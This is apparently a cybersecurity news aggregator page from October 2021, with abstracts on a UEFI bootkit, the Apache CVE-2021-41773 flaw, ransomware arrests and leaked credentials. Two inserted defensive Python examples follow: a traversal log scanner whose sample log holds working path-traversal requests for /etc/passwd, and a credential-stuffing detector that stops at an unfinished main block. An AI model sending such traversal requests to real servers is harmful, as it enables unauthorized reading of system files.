Cybersecurity researchers on Tuesday revealed details of a previously undocumented UEFI (Unified Extensible Firmware Interface) bootkit that has been put to use by threat actors to backdoor Windows systems as early as 2012 by modifying a legitimate Windows Boot Manager binary to achieve persistence, once again demonstrating how technology meant to secure the environment prior to loading the operating system is increasingly becoming a "tempting target." Slovak cybersecurity firm ESET codenamed the new malware "ESPecter" for its ability to persist on the EFI System Partition ( ESP ), in addition to circumventing Microsoft Windows Driver Signature Enforcement to load its own unsigned driver that can be used to facilitate espionage activities such as document theft, keylogging, and screen monitoring by periodically capturing screenshots. "ESPecter shows that threat actors are relying not only on UEFI firmware implants when it comes to pre-OS persistence and,The Hacker News
October 5, 2021 – Vulnerabilities
Apache patches a zero-day flaw exploited in the wild Full Text
Abstract
Apache has addressed two vulnerabilities, one of which is a path traversal and file disclosure flaw in its HTTP server actively exploited in the wild. Apache has rolled out security patches to address two flaws, including a path traversal and file...Security Affairs
October 5, 2021 – Education
How to Build an Incident-Response Plan, Before Security Disaster Strikes Full Text
Abstract
Joseph Carson, Chief Security Scientist at ThycoticCentrify, offers a 7-step practical IR checklist for ensuring a swift recovery from a cyberattack.Threatpost
October 05, 2021 – Breach
The Telegraph exposes 10 TB database with subscriber info Full Text
Abstract
'The Telegraph', one of UK's largest newspapers and online media outlets, has leaked 10 TB of data after failing to properly secure one of its databases.BleepingComputer
October 5, 2021 – Malware
Analyzing LockBit’s Data Exfiltration Model Full Text
Abstract
Yoroi Malware ZLAB analyzed the new working model of LockBit 2.0 that has recently developed its custom tool specialized in data exfiltration. The RaaS group has been helping its partners by providing StealBit data exfiltration service. With the proliferation of such tools, protecting sensitiv ... Read MoreCyware Alerts - Hacker News
October 05, 2021 – Government
Lawmakers introduce bill to identify and protect critical groups from cyber threats Full Text
Abstract
House Homeland Security Committee ranking member John Katko (R-N.Y.) and Rep. Abigail Spanberger (D-Va.) on Tuesday introduced legislation to help the federal government identify and further protect certain critical groups from cyberattacks.The Hill
October 05, 2021 – Vulnerabilities
Apache Warns of Zero-Day Exploit in the Wild — Patch Your Web Servers Now! Full Text
Abstract
Apache has issued patches to address two security vulnerabilities, including a path traversal and file disclosure flaw in its HTTP server that it said is being actively exploited in the wild. "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root," the open-source project maintainers noted in an advisory published Tuesday. "If files outside of the document root are not protected by 'require all denied' these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts." The flaw, tracked as CVE-2021-41773 , affects only Apache HTTP server version 2.4.49. Ash Daulton and cPanel Security Team have been credited with discovering and reporting the issue on September 29, 2021. Also resolved by Apache is a null pointer dereference vulnerability observed during prThe Hacker News
October 5, 2021 – Criminals
Unnamed Ransomware gang uses a Python script to encrypt VMware ESXi servers Full Text
Abstract
An unnamed ransomware gang used a custom Python script to target VMware ESXi and encrypt all the virtual machines hosted on the server. Researchers from Sophos were investigating a ransomware attack when they discovered that the attackers employed a Python...Security Affairs
October 05, 2021 – Vulnerabilities
Apache fixes actively exploited zero-day vulnerability, patch now Full Text
Abstract
The Apache Software Foundation has released version 2.4.50 of the HTTP Web Server to address two vulnerabilities, one of which is an actively exploited path traversal and file disclosure flaw.BleepingComputer
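The Apache entries above describe CVE-2021-41773 as a path traversal in 2.4.49 that maps URLs to files outside the document root unless those paths are covered by 'require all denied'. As an added example (not code from the articles, from the Apache project or from the exploit circulating at the time), the Python below does the two checks a responder wants first: it scans access-log lines for requests whose fully decoded path climbs above the document root, and it tests a Server header for the one affected version string. The log lines are constructed; the encoded-dot request among them illustrates the kind of request that a normalizer which looks for `..` before it decodes `%2e` lets through.

```python
"""Added example (not from the article, the Apache project or any exploit code):
flag access-log requests whose decoded path climbs above the document root, the
behaviour CVE-2021-41773 describes, and test a Server header for the affected
release.  The log lines are constructed samples, not captured traffic."""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format.  The second line carries
# an encoded-dot request: a normalizer that looks for ".." before it decodes
# "%2e" never sees the traversal, which is the bug class at issue here.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Oct/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [05/Oct/2021:10:01:05 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1024 "-" "curl/7.79"
203.0.113.12 - - [05/Oct/2021:10:01:09 +0000] "GET /icons/..%2f..%2f..%2fetc/hosts HTTP/1.1" 403 199 "-" "curl/7.79"
203.0.113.13 - - [05/Oct/2021:10:01:12 +0000] "GET /docs/../docs/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

AFFECTED_VERSIONS = {"2.4.49"}  # the single release the advisory names


def escapes_root(raw_path):
    """True if the request path, once fully percent-decoded, ever steps above
    the document root.  Decoding is repeated (bounded) so double-encoded dots
    such as %252e are caught as well as single-encoded %2e."""
    decoded = raw_path.split("?", 1)[0]
    for _ in range(3):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    depth = 0
    for seg in decoded.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def scan_log(text):
    """Return one finding per request that escapes the root: source IP, raw
    path and the status the server returned.  A 200 here means the file was
    actually served."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and escapes_root(m["path"]):
            findings.append({"ip": m["ip"], "path": m["path"], "status": int(m["status"])})
    return findings


def server_header_vulnerable(server_header):
    """True if a Server header such as 'Apache/2.4.49 (Unix)' names the affected
    release.  A triage hint only: vendor backports can fix without bumping the
    number, and a bumped number does not prove the fix is complete."""
    m = re.search(r"Apache/(\d+\.\d+\.\d+)", server_header)
    return bool(m and m.group(1) in AFFECTED_VERSIONS)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['status']} {f['path']}")
    print("2.4.49 affected:", server_header_vulnerable("Apache/2.4.49 (Unix)"))
```

A 200 on a flagged request means the file outside the root was served, so treat it as a confirmed read and review which directories lack a 'Require all denied' block; a 403 means the access rules held. The version check is only a hint: distribution packages may backport the fix without changing the version string, and the 2.4.50 fix itself turned out to be incomplete and was followed by 2.4.51, so verify patch state rather than the number.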
October 5, 2021 – Breach
Misconfigured, Old Apache Airflow Instances Leak Slack, AWS Credentials Full Text
Abstract
On Monday, Intezer researchers said the instances, vulnerable to data theft, belong to industries including IT, cybersecurity, health, energy, finance, and manufacturing, among other sectors.ZDNet
October 05, 2021 – Hacker
New Study Links Seemingly Disparate Malware Attacks to Chinese Hackers Full Text
Abstract
Chinese cyber espionage group APT41 has been linked to seemingly disparate malware campaigns, according to fresh research that has mapped together additional parts of the group's network infrastructure to hit upon a state-sponsored campaign that takes advantage of COVID-themed phishing lures to target victims in India. "The image we uncovered was that of a state-sponsored campaign that plays on people's hopes for a swift end to the pandemic as a lure to entrap its victims," the BlackBerry Research and Intelligence team said in a report shared with The Hacker News. "And once on a user's machine, the threat blends into the digital woodwork by using its own customized profile to hide its network traffic." APT41 (aka Barium or Winnti) is a moniker assigned to a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in conjunction with financially motivated operations for personal gain as far back as 2012. Calling the groThe Hacker News
October 5, 2021 – Breach
Telco service provider giant Syniverse had unauthorized access since 2016 Full Text
Abstract
Syniverse, a telecommunications service provider, disclosed a security breach: threat actors have had access to its databases since 2016 and obtained some customers' credentials. Syniverse is a global company that provides technology and business services for a number of telecommunications...Security Affairs
October 05, 2021 – Criminals
Ransomware gang encrypts VMware ESXi servers with Python script Full Text
Abstract
Operators of an unknown ransomware gang are using a Python script to encrypt virtual machines hosted on VMware ESXi servers.BleepingComputer
October 5, 2021 – Ransomware
New Ransomware Aims at Virtual Machines, ESXi Hypervisors to Encrypt Disks Full Text
Abstract
The attack, one of the fastest recorded by Sophos researchers, was achieved by operators who "precision-targeted the ESXi platform" in order to encrypt the virtual machines of the victim.ZDNet
October 05, 2021 – Criminals
Ransomware Hackers Who Attacked Over 100 Companies Arrested in Ukraine Full Text
Abstract
Law enforcement agencies have announced the arrest of two "prolific ransomware operators" in Ukraine who allegedly conducted a string of targeted attacks against large industrial entities in Europe and North America since at least April 2020, marking the latest step in combating ransomware incidents. The joint exercise was undertaken on September 28 by officials from the French National Gendarmerie, the Ukrainian National Police, and the U.S. Federal Bureau of Investigation (FBI), alongside participation from the Europol's European Cybercrime Centre and the INTERPOL's Cyber Fusion Centre. "The criminals would deploy malware and steal sensitive data from these companies, before encrypting their files," Europol said in a press statement on Monday. "They would then proceed to offer a decryption key in return for a ransom payment of several millions of euros, threatening to leak the stolen data on the dark web should their demands not be met." BThe Hacker News
October 5, 2021 – Hacker
Dark web marketplace White House announces end to its operations Full Text
Abstract
The dark web marketplace White House Market has shut down its operation; last week its operators announced that they were retiring. The announcement was published on the Dread forum....Security Affairs
October 05, 2021 – Vulnerabilities
Android October patch fixes three critical bugs, 41 flaws in total Full Text
Abstract
Google has released the Android October security updates, addressing 41 vulnerabilities, all ranging between high and critical severity.BleepingComputer
October 5, 2021 – Business
Temasek leads $550M Series C extension into Orca Security, which aims for further international foothold Full Text
Abstract
Orca Security, an Israeli security company offering an agent-less platform for protecting cloud-based assets, secured a $550 million extension to the Series C funding round it raised seven months ago.TechCrunch
October 5, 2021 – Vulnerabilities
Misconfigured Apache Airflow servers leak thousands of credentials Full Text
Abstract
Experts discovered many misconfigured Apache Airflow servers exposed online that were leaking sensitive information from prominent tech firms. Apache Airflow is an open-source workflow management platform used by many organizations worldwide for automating...Security Affairs
October 05, 2021 – Malware
New UEFI bootkit used to backdoor Windows devices since 2012 Full Text
Abstract
A newly discovered and previously undocumented UEFI (Unified Extensible Firmware Interface) bootkit has been used by attackers to backdoor Windows systems by hijacking the Windows Boot Manager since at least 2012.BleepingComputer
October 5, 2021 – Breach
OnionShare: Secure communications platform used by whistleblowers and journalists patches data exposure bug Full Text
Abstract
A tool used by whistleblowers and the media to securely send information has patched two vulnerabilities that could have impacted the anonymous nature of the file-sharing system.The Daily Swig
October 4, 2021 – Outage
Facebook Outage Drags Down Instagram, WhatsApp, Messenger, Oculus VR Full Text
Abstract
They were all flat on their faces for hours on Monday, throwing off DNS error messages or other server-related errors.Threatpost
October 4, 2021 – Malware
Encrypted & Fileless Malware Sees Big Growth Full Text
Abstract
An analysis of second-quarter malware trends shows that threats are becoming stealthier.Threatpost
October 4, 2021 – Criminals
Transnational Fraud Ring Bilks U.S. Military Service Members Out of Millions Full Text
Abstract
A former medical records tech stole PII that was then used to fraudulently claim DoD and VA benefits, particularly targeting disabled veterans.Threatpost
October 04, 2021 – Breach
Largest mobile SMS routing firm discloses five-year-long breach Full Text
Abstract
Syniverse, a service provider for most telecommunications companies, disclosed that hackers had access to its databases over the past five years and compromised login credentials belonging to hundreds of customers.BleepingComputer
October 4, 2021 – Outage
Sandhill Shut Down by Conti Ransomware Attack Full Text
Abstract
The publication giant, Sandhill, suffered a ransomware attack that unfortunately caused hosted websites to become inaccessible, in this way disrupting their business operations.Heimdal Security
October 04, 2021 – Criminals
International coalition arrests ‘prolific’ hackers involved in ransomware attacks Full Text
Abstract
An international coalition of American, French, Ukrainian and European Union (EU) law enforcement authorities coordinated on the arrest last week of two individuals and the seizure of millions of dollars in profit allegedly involved with a spree of damaging ransomware attacks.The Hill
October 04, 2021 – Vulnerabilities
Creating Wireless Signals with Ethernet Cable to Steal Data from Air-Gapped Systems Full Text
Abstract
A newly discovered data exfiltration mechanism employs Ethernet cables as a "transmitting antenna" to stealthily siphon highly-sensitive data from air-gapped systems, according to the latest research. "It's interesting that the wires that came to protect the air-gap become the vulnerability of the air gap in this attack," Dr. Mordechai Guri, the head of R&D in the Cyber Security Research Center in the Ben Gurion University of the Negev in Israel, told The Hacker News. Dubbed " LANtenna Attack ," the novel technique enables malicious code in air-gapped computers to amass sensitive data and then encode it over radio waves emanating from Ethernet cables just as if they are antennas. The transmitted signals can then be intercepted by a nearby software-defined radio (SDR) receiver wirelessly, decode the data, and send it to an attacker who is in an adjacent room. "Notably, the malicious code can run in an ordinary user-mode process and successfThe Hacker News
October 4, 2021 – Outage
Facebook, WhatsApp, and Instagram are down worldwide, it’s panic online Full Text
Abstract
Users worldwide are experiencing problems while accessing Facebook services, including Instagram and WhatsApp. Users worldwide are not able to access Facebook, Instagram, and WhatsApp services due to BGP problems. Users attempting to visit the above...Security Affairs
October 04, 2021 – Hacker
RaidForums forced to use mirror after Brazilian govt contacts registrar Full Text
Abstract
The RaidForums hacking forum has gone through a turbulent week, with its website now forced through a mirror domain after a government filed a legal request with their registrar.BleepingComputer
October 4, 2021 – Vulnerabilities
PoC Exploit Released for macOS Gatekeeper Bypass Full Text
Abstract
Rasmus Sten, a software engineer with cybersecurity firm F-Secure, has released proof-of-concept (PoC) exploit code for a macOS Gatekeeper bypass that Apple patched in April this year.Security Week
October 04, 2021 – Government
Senators warn of Chinese technology threats ahead of international meeting Full Text
Abstract
The leaders of the Senate Intelligence Committee on Monday warned of continuing threats posed by the Chinese government to telecommunications systems and other critical technologies ahead of a major international summit.The Hill
October 04, 2021 – Vulnerabilities
Poorly Configured Apache Airflow Instances Leak Credentials for Popular Services Full Text
Abstract
Cybersecurity researchers on Monday discovered misconfigurations across older versions of Apache Airflow instances belonging to a number of high-profile companies across various sectors, resulting in the exposure of sensitive credentials for popular platforms and services such as Amazon Web Services (AWS), Binance, Google Cloud Platform (GCP), PayPal, Slack, and Stripe. "These unsecured instances expose sensitive information of companies across the media, finance, manufacturing, information technology (IT), biotech, e-commerce, health, energy, cybersecurity, and transportation industries," Intezer said in a report shared with The Hacker News. Originally launched in June 2015, Apache Airflow is an open-source workflow management platform that enables programmatic scheduling and monitoring of workflows on AWS, GCP, Microsoft Azure, and other third-party services. It's also one of the most popular task orchestration tools, followed by Luigi, Kubeflow, and MLflow. SoThe Hacker News
October 4, 2021 – Outage
Pottawatomie County paid the ransom to recover its systems Full Text
Abstract
Pottawatomie County restored operations that were suspended after a ransomware attack hit its systems on September 17, 2021. Officials at Pottawatomie County announced that they have fully recovered their IT infrastructure, which was hit by a ransomware attack...Security Affairs
October 04, 2021 – Breach
Misconfigured Apache Airflow servers leak thousands of credentials Full Text
Abstract
While investigating a misconfiguration flaw in Apache Airflow, researchers discovered many exposed instances over the web leaking sensitive information, including credentials, from well-known tech companies. Apache Airflow is a popular open-source workflow management platform for organizing and managing tasks.BleepingComputer
October 4, 2021 – Criminals
Ukrainian Police Arrest Hacker Who Caused $150 Million Damage to Global Firms Full Text
Abstract
Ukrainian police said they had arrested a 25-year-old man who hacked more than 100 foreign companies and caused damage worth more than $150 million. The hacker used phishing attacks and hijacked software that allows computers to be accessed remotely.Reuters
October 04, 2021 – Government
Senators introduce bill to strengthen federal cybersecurity after attacks Full Text
Abstract
Senate Homeland Security and Governmental Affairs Committee Chairman Gary Peters (D-Mich.) and ranking member Rob Portman (R-Ohio) introduced a bill Monday to overhaul and improve federal cybersecurity policies following multiple major cyberattacks.The Hill
October 04, 2021 – APT
A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries Full Text
Abstract
A previously undocumented threat actor has been identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks. Cybersecurity company Positive Technologies dubbed the advanced persistent threat (APT) group ChamelGang — referring to their chameleonic capabilities, including disguising "its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google." "To achieve their goal, the attackers used a trending penetration method—supply chain," the researchers said of one of the incidents investigated by the firm. "The group compromised a subsidiary and penetrated the target company's network through it. Trusted relationship attacks are rare today due to the complexity of their execution. Using this method […], the ChamelGang group was able to achieve its goal aThe Hacker News
October 4, 2021 – Criminals
Two ransomware operators were arrested in Kyiv with EUROPOL’s support Full Text
Abstract
Two ransomware operators arrested in Kyiv, Ukraine, that are suspected to have attacked more than 100 companies causing more than $150M in damages. A joint international law enforcement operation led to the arrest of the ransomware operators in Kyiv,...Security Affairs
October 04, 2021 – Government
UK plans to invest £5 billion in retaliatory cyber-attacks Full Text
Abstract
The United Kingdom has revealed plans to invest £5 billion in bolstering national cybersecurity that includes creating a "Cyber Force" unit to perform retaliatory attacks.BleepingComputer
October 4, 2021 – Policy and Law
Fraudster jailed for stealing US military health records, millions in benefits Full Text
Abstract
Between July 2014 and September 2015, the 40-year-old stole the personal identifying information (PII) of over 3,300 individuals, including "at least eight general officers, as well as numerous disabled veterans," said the DoJ.ZDNet
October 04, 2021 – Education
The Shortfalls of Mean Time Metrics in Cybersecurity Full Text
Abstract
Security teams at mid-sized organizations are constantly faced with the question of "what does success look like?". At ActZero, their continued data-driven approach to cybersecurity invites them to grapple daily with measuring, evaluating, and validating the work they do on behalf of their customers. Like most, they initially turned toward the standard metrics used in cybersecurity, built around a "Mean Time to X" (MTTX) formula, where X indicates a specific milestone in the attack lifecycle. In this formula, these milestones include factors like Detect, Alert, Respond, Recover, or even Remediate when necessary. However, as they started to operationalize their unique AI and machine-learning approach , they realized that "speed" measures weren't giving them a holistic view of the story. More importantly, simply measuring just speed wasn't as applicable in an industry where machine-driven alerts and responses were happening in fractions of seconThe Hacker News
October 4, 2021 – APT
New APT ChamelGang Targets energy and aviation companies in Russia Full Text
Abstract
ChamelGang APT is a new cyberespionage group that focuses on fuel and energy organizations and the aviation industry in Russia. ChamelGang is a new APT group that was first spotted in March by researchers at security firm Positive Technologies; it targets...Security Affairs
October 04, 2021 – Ransomware
New Atom Silo ransomware targets vulnerable Confluence servers Full Text
Abstract
Atom Silo, a newly spotted ransomware group, is targeting a recently patched and actively exploited Confluence Server and Data Center vulnerability to deploy their ransomware payloads.BleepingComputer
October 4, 2021 – Outage
Pottawatomie County Fixing Systems After Ransomware Attack Full Text
Abstract
The county resolved the attack by paying less than 10% of the hackers’ original demands, County Administrator Chad Kinsley said in a statement. The eastern Kansas county did not disclose the amount it paid.Security Week
October 4, 2021 – Attack
LockBit 2.0 ransomware hit Israeli defense firm E.M.I.T. Aviation Consulting Full Text
Abstract
Israeli Aerospace & Defense firm E.M.I.T. Aviation Consulting Ltd. was hit by LockBit 2.0 ransomware, operators will leak files on 07 Oct, 2021. LockBit 2.0 ransomware operators hit the Israeli aerospace and defense firm E.M.I.T. Aviation Consulting...Security Affairs
October 04, 2021 – Criminals
Ransomware operators behind hundreds of attacks arrested in Ukraine Full Text
Abstract
Europol has announced the arrest of two men in Ukraine, said to be members of a prolific ransomware operation that extorted victims with ransom demands ranging from €5 to €70 million.BleepingComputer
October 4, 2021 – Malware
TA544 group behind a spike in Ursnif malware campaigns targeting Italy Full Text
Abstract
Proofpoint researchers have discovered a new Ursnif banking Trojan campaign carried out by a group tracked as TA544 that is targeting organizations in Italy. The experts observed nearly 20 notable campaigns.Security Affairs
October 03, 2021 – Criminals
Transnational fraud ring stole millions from Army members, veterans Full Text
Abstract
Fredrick Brown, a former U.S. Army contractor, was sentenced today to 151 months in prison after admitting to his role in a conspiracy that targeted thousands of U.S. servicemembers and veterans and caused millions of dollars in losses.BleepingComputer
October 3, 2021 – Criminals
TA544 group behind a spike in Ursnif malware campaigns targeting Italy Full Text
Abstract
Proofpoint researchers reported that TA544 threat actors are behind a new Ursnif campaign that is targeting Italian organizations. Proofpoint researchers have discovered a new Ursnif banking Trojan campaign carried out by a group tracked as TA544...Security Affairs
October 3, 2021 – Vulnerabilities
CVE-2021-38647 OMIGOD flaw impacts IBM QRadar Azure Full Text
Abstract
Experts warn that the CVE-2021-38647 OMIGOD flaw affects IBM QRadar Azure and can be exploited by remote attackers to execute arbitrary code. The Open Management Infrastructure RPM package in the IBM QRadar Azure marketplace images is affected by a remote...Security Affairs
October 3, 2021 – General
Security Affairs newsletter Round 334 Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the international press subscribe here. Threat...Security Affairs
October 3, 2021 – Government
The Biden administration will work with 30 countries to curb global cybercrime Full Text
Abstract
The Biden administration announced it will work with 30 countries, including NATO allies and G7 partners, to curb global cybercrime. U.S. President Joe Biden announced that the US will work with 30 countries to curb cybercrime and dismantle ransomware...Security Affairs
October 02, 2021 – General
False election claims undermine efforts to increase security Full Text
Abstract
Officials say the biggest threat facing U.S. elections isn't Russian hacking or domestic voter fraud but disinformation and misinformation increasingly undermining the public’s perception of voting security.The Hill
October 02, 2021 – Outage
Sandhills online machinery markets shut down by ransomware attack Full Text
Abstract
Industry publication giant Sandhills Global has suffered a ransomware attack, causing hosted websites to become inaccessible and disrupting their business operations.BleepingComputer
October 2, 2021 – Cryptocurrency
Threat actors exploit a flaw in Coinbase 2FA to steal user funds Full Text
Abstract
Threat actors stole funds from the accounts of more than 6,000 users of the crypto exchange Coinbase by exploiting a flaw to bypass two-factor authentication. Threat actors have exploited a vulnerability in the SMS-based two-factor authentication (2FA) system...Security Affairs
October 2, 2021 – Breach
Mozilla: Superman, Batman, Spider-Man dominate list of passwords leaked in breaches Full Text
Abstract
Superhero-based passwords are increasingly showing up in datasets of breached information, according to a new blog post from Mozilla. Mozilla used data from haveibeenpwned.com to figure out the most common passwords found in breached datasets.ZDNet
October 2, 2021 – Malware
Flubot Android banking Trojan spreads via fake security updates Full Text
Abstract
The Flubot Android malware is now leveraging fake security update warnings to trick users into installing the malicious code. Threat actors behind the Flubot Android malware are now leveraging fake security updates to trick victims into installing...Security Affairs
October 2, 2021 – Malware
Password-stealing Android malware uses sneaky security warning to trick you into downloading Full Text
Abstract
FluBot attacks have commonly come in the form of text messages which claim the recipient has missed a delivery, asking them to click a link to install an app to organize a redelivery. This app installs the malware.ZDNet
October 2, 2021 – Vulnerabilities
Tim’s RED Team Research reports 3 new CVEs, two of which are in 4G/5G Full Text
Abstract
The Telecom Italia Red Team Research (RTR) laboratory, led by Massimiliano Brolli, reported three new flaws in Oracle GlassFish and Nokia NetAct. The Telecom Italia Red Team Research (RTR) laboratory, led by Massimiliano Brolli, reported three new vulnerabilities...Security Affairs
October 2, 2021 – Cryptocurrency
Coinbase says hackers stole cryptocurrency from at least 6,000 customers Full Text
Abstract
Hackers stole from the accounts of at least 6,000 customers of Coinbase Global Inc, according to a breach notification letter sent by the cryptocurrency exchange to affected customers.Reuters
October 2, 2021 – Government
White House to convene 30-country cybersecurity meeting Full Text
Abstract
The topics of the meeting, President Biden said, will include combating cybercrime, improving law enforcement collaboration, stemming the illicit use of cryptocurrency, building trusted 5G technology and better securing supply chains.ZDNet
October 01, 2021 – Ransomware
The Week in Ransomware - October 1st 2021 - “This was preventable” Full Text
Abstract
This week comes with reports of a hospital ransomware attack that led to the death of a baby and new efforts by governments worldwide to combat ransomware.BleepingComputer
October 01, 2021 – Government
Biden ‘confident’ in the nation’s cybersecurity efforts as Cybersecurity Awareness Month begins Full Text
Abstract
President Biden on Friday expressed confidence in measures taken by his administration during his first months in office to secure the nation against mounting cyber threats as Cybersecurity Awareness Month kicks off.The Hill
October 01, 2021 – Vulnerabilities
Apple Pay Can be Abused to Make Contactless Payments From Locked iPhones Full Text
Abstract
Cybersecurity researchers have disclosed an unpatched flaw in Apple Pay that attackers could abuse to make an unauthorized Visa payment with a locked iPhone by taking advantage of the Express Travel mode set up in the device's wallet. "An attacker only needs a stolen, powered on iPhone. The transactions could also be relayed from an iPhone inside someone's bag, without their knowledge," a group of academics from the University of Birmingham and University of Surrey said. "The attacker needs no assistance from the merchant and backend fraud detection checks have not stopped any of our test payments." Express Travel is a feature that allows users of iPhone and Apple Watch to make quick contactless payments for public transit without having to wake or unlock the device, open an app, or even validate with Face ID, Touch ID or a passcode. The man-in-the-middle (MitM) replay and relay attack, which involves bypassing the lock screen to make a payment...The Hacker News
October 1, 2021 – Education
The Cyber Monoculture Risk Full Text
Abstract
Monoculture risk is manageable for most systems, but that isn’t the case for government systems. For these systems, monoculture vulnerability is a national security risk.Lawfare
October 1, 2021 – Breach
MFA Glitch Leads to 6K+ Coinbase Customers Getting Robbed Full Text
Abstract
Coinbase suspects phishing led to attackers getting personal details needed to access wallets but also blamed a flaw in its SMS-based 2FA.Threatpost
October 01, 2021 – Government
US unites 30 countries to disrupt global ransomware attacks Full Text
Abstract
U.S. President Joe Biden announced today that the U.S. has brought together 30 countries to jointly crack down on the ransomware gangs behind a barrage of attacks impacting organizations worldwide.BleepingComputer
October 01, 2021 – Breach
Neiman Marcus notifying 4.6M customers of data breach Full Text
Abstract
Department store Neiman Marcus announced Friday that it was in the process of notifying 4.6 million online customers that some of their data had been compromised as part of a data breach that took place last year.The Hill
October 01, 2021 – Hacker
Chinese Hackers Used a New Rootkit to Spy on Targeted Windows 10 Users Full Text
Abstract
A formerly unknown Chinese-speaking threat actor has been linked to a long-standing evasive operation aimed at South East Asian targets as far back as July 2020 to deploy a kernel-mode rootkit on compromised Windows systems. Attacks mounted by the hacking group, dubbed GhostEmperor by Kaspersky, are also said to have used a "sophisticated multi-stage malware framework" that allows for providing persistence and remote control over the targeted hosts. The Russian cybersecurity firm called the rootkit Demodex, with infections reported across several high-profile entities in Malaysia, Thailand, Vietnam, and Indonesia, in addition to outliers located in Egypt, Ethiopia, and Afghanistan. "[Demodex] is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting undocumented loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Sig...The Hacker News
October 01, 2021 – Government
FCC orders phone carriers to enforce unlawful robocall blocking Full Text
Abstract
The Federal Communications Commission (FCC) announced earlier this week that phone companies are now required to filter calls from providers that missed the September 28th deadline for implementing measures to block illegal robocalls.BleepingComputer
October 1, 2021 – Attack
Baby died at Alabama Springhill Medical Center due to cyber attack Full Text
Abstract
A baby allegedly received inadequate childbirth health care, and later died, at an Alabama Springhill Medical Center due to a ransomware attack. An Alabama woman named Teiranni Kidd has filed suit after the death of her baby, she claims that the Springhill...Security Affairs
October 01, 2021 – Cryptocurrency
Crypto platform mistakenly gives $90M to users, asks for refund Full Text
Abstract
In a major blunder, cryptocurrency platform Compound accidentally paid out $90 million to its users. Shortly after the mistake, the platform's founder began asking users to return the money, threatening that those who did not would be reported to the IRS and possibly doxxed.BleepingComputer
October 1, 2021 – Malware
Hydra Android trojan campaign targets customers of European banks Full Text
Abstract
Experts warn of a new Hydra banking trojan campaign targeting European e-banking platform users, including the customers of Commerzbank. Experts warn of a malware campaign targeting European e-banking platform users with the Hydra banking trojan....Security Affairs
October 01, 2021 – Attack
MoneyLion locks customer accounts after credential stuffing attacks Full Text
Abstract
The banking and investing platform MoneyLion had to lock customer accounts that were breached in credential stuffing attacks over the summer, in June and July.BleepingComputer
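The MoneyLion item above describes the response (locking the accounts that were actually breached) but not how stuffing is spotted. The following is an added example, not MoneyLion's own detection logic: it runs over a constructed authentication log in an assumed "timestamp ip username result" format and flags source IPs that show the stuffing signature, one source trying many distinct accounts roughly once each with a high failure rate, then lists the accounts that succeeded from those sources as candidates to lock. Thresholds are illustrative assumptions. Plain brute force against a single account (one user, many attempts) is deliberately not flagged by this rule so the two patterns stay distinguishable.

```python
from collections import defaultdict

# Constructed sample authentication log (not real traffic). Assumed format:
# "<timestamp> <source ip> <username> <FAIL|SUCCESS>"
SAMPLE_LOG = """\
2021-06-14T02:00:01Z 203.0.113.10 alice FAIL
2021-06-14T02:00:02Z 203.0.113.10 bob FAIL
2021-06-14T02:00:02Z 203.0.113.10 carol FAIL
2021-06-14T02:00:03Z 203.0.113.10 dave FAIL
2021-06-14T02:00:03Z 203.0.113.10 erin SUCCESS
2021-06-14T02:00:04Z 203.0.113.10 frank FAIL
2021-06-14T02:00:04Z 203.0.113.10 grace FAIL
2021-06-14T02:00:05Z 203.0.113.10 heidi FAIL
2021-06-14T02:00:06Z 203.0.113.10 ivan SUCCESS
2021-06-14T02:00:07Z 203.0.113.10 judy FAIL
2021-06-14T02:00:08Z 198.51.100.7 alice FAIL
2021-06-14T02:00:09Z 198.51.100.7 alice FAIL
2021-06-14T02:00:10Z 198.51.100.7 alice SUCCESS
2021-06-14T02:01:00Z 192.0.2.44 mallory SUCCESS
"""


def parse_log(text):
    """Parse the assumed log format into (timestamp, ip, user, result) tuples.

    Blank or malformed lines are skipped rather than raising, so a partially
    corrupted log still yields the events that can be read.
    """
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, ip, user, result = parts
        events.append((ts, ip, user, result.upper()))
    return events


def analyze(events, min_accounts=8, min_failure_rate=0.6):
    """Flag source IPs showing the credential stuffing pattern.

    Stuffing replays leaked username/password pairs, so one source touches
    many distinct accounts and most attempts fail (the leaked password is
    stale). Successes from a flagged source are the accounts whose reused
    credentials still worked; those are the ones to lock and reset.
    Returns {"flagged_ips": set, "accounts_to_lock": set, "per_ip": dict}.
    """
    per_ip = defaultdict(lambda: {"users": set(), "attempts": 0,
                                  "failures": 0, "successes": set()})
    for _ts, ip, user, result in events:
        stats = per_ip[ip]
        stats["users"].add(user)
        stats["attempts"] += 1
        if result == "SUCCESS":
            stats["successes"].add(user)
        else:
            stats["failures"] += 1

    flagged_ips = set()
    accounts_to_lock = set()
    for ip, stats in per_ip.items():
        failure_rate = stats["failures"] / stats["attempts"]
        if len(stats["users"]) >= min_accounts and failure_rate >= min_failure_rate:
            flagged_ips.add(ip)
            accounts_to_lock |= stats["successes"]
    return {"flagged_ips": flagged_ips,
            "accounts_to_lock": accounts_to_lock,
            "per_ip": dict(per_ip)}


if __name__ == "__main__":
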